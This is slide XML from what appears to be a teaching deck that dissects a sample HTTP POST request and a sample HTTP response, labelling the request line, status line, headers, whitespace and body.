            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-381000" y="1282258"/>
              <a:ext cx="6858000" cy="4154984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350">
              <a:noFill/>
              <a:prstDash val="dash"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>api</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/users HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Host: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>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www.target-server.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>User-Agent: Mozilla/4.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept: */*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Length: 23</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Type: application/x-www-form-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>urlencoded</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>username=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Jane+Doe&amp;password</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=p455</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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B732A7D-EE59-4C3E-86B5-573F1E14E03F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="2755419"/>
              <a:ext cx="2080204" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>HEADERS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC30F05-B047-4895-B71F-D62B0B7EBB8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6512886" y="1752600"/>
              <a:ext cx="431821" cy="232774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9108008-6E56-4E61-9A6E-467F12DD9B79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6408956" y="1263984"/>
              <a:ext cx="2735044" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>REQUEST LINE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3917EF-B022-4E71-B569-31425085E190}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6367328" y="4152082"/>
              <a:ext cx="2471872" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WHITESPACE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="73152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580D11F-AD45-49CD-B9B2-2136E97F9FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="4869298"/>
            <a:ext cx="2971800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>REQUEST BODY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1831688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55160F-278D-4C52-B08B-0DBFBD078C04}"/>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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="7989110" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of an HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091F7199-BD93-42AE-ACCE-ED691D8D1B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-381000" y="1527037"/>
            <a:ext cx="9296400" cy="4542589"/>
            <a:chOff x="-381000" y="1263984"/>
            <a:chExt cx="9296400" cy="4542589"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-381000" y="1282258"/>
              <a:ext cx="7050006" cy="4524315"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350">
              <a:noFill/>
              <a:prstDash val="dash"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Date: Nov 12 02:12:12 2018</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Server: Apache/2.4.7 (Ubuntu)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>X-Powered-By: PHP/5.5.9-lubuntu4.21</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Cache-Control: no-cache</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Set-Cookie: SESSID=8toks; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>httponly</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Encoding: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>gzip</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Length: 698</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>function </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>getStats</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(event) {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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B732A7D-EE59-4C3E-86B5-573F1E14E03F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="2755419"/>
              <a:ext cx="2080204" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>HEADERS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC30F05-B047-4895-B71F-D62B0B7EBB8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6512886" y="1752599"/>
              <a:ext cx="431821" cy="248014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9108008-6E56-4E61-9A6E-467F12DD9B79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6408956" y="1263984"/>
              <a:ext cx="2436501" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>STATUS LINE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3917EF-B022-4E71-B569-31425085E190}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6443528" y="4232747"/>
              <a:ext cx="2471872" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WHITESPACE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="777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E68BD8-AC4E-4D8C-BB99-686ADFBC3365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6987596" y="5330963"/>
            <a:ext cx="2080204" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
